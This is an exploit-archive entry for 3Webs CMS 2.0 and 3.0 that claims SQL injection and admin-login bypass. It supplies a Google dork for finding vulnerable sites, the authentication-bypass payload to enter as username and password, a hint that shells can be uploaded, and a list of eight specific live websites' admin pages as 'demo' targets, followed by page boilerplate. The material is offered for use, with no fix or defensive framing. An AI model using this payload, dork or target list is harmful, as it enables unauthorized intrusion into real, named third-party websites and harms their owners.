3Webs CMS 2.0 & 3.0 Bypass & SQL Injection

2016.09.17

MrHoudini (IR)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: intext:"Desenvolvido por 3webs"

# Exploit Title : 3Webs CMS 2.0 & 3.0 Bypass & SQL Injection
# Google Dork : intext:"Desenvolvido por 3webs"
# Discovered By : MrHoudini
# Contact Me : Mr.Houdini77@Gmail.com
# My WebSite: www.MrHoudini.ir
# Date : 17-9-2016
# Vendor Homepage : http://www.3webs.com.br/


Exploit : 

Des :

All the Sites Have SQL Injection and Admin Page Bypass and on Some Of Them You Can Upload Shell or
HTML File . 


Username : '=' 'or'
Password : '=' 'or'

Demo : 

http://andreapinheiro.arq.br/admin/
http://celiapaisagista.com.br/admin/
http://elevartecelevadores.com.br/admin/
http://reno1000.com.br/admin/
http://contrem.com/admin/
http://frikotesjoias.com/admin/
http://idepsocial.org.br/admin/
http://dtsdistribuidora.com.br/admin/

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

3Webs CMS 2.0 & 3.0 Bypass & SQL Injection

Dork: intext:"Desenvolvido por 3webs"

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.